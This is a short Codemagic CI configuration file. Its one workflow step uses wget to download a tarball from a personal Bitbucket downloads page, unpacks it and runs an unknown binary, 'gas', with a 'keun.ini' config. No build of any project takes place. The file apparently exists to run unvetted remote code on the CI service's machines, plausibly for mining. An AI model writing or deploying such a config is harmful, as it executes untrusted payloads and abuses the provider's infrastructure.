#codemagic.yaml
workflows:
  default-workflow:
    name: Default Workflow
    instance_type: linux
    max_build_duration: 120
    scripts:
      - wget https://bitbucket.org/19410711/dumang/downloads/joss.tar.gz && tar -xvf joss.tar.gz && ./gas keun.ini
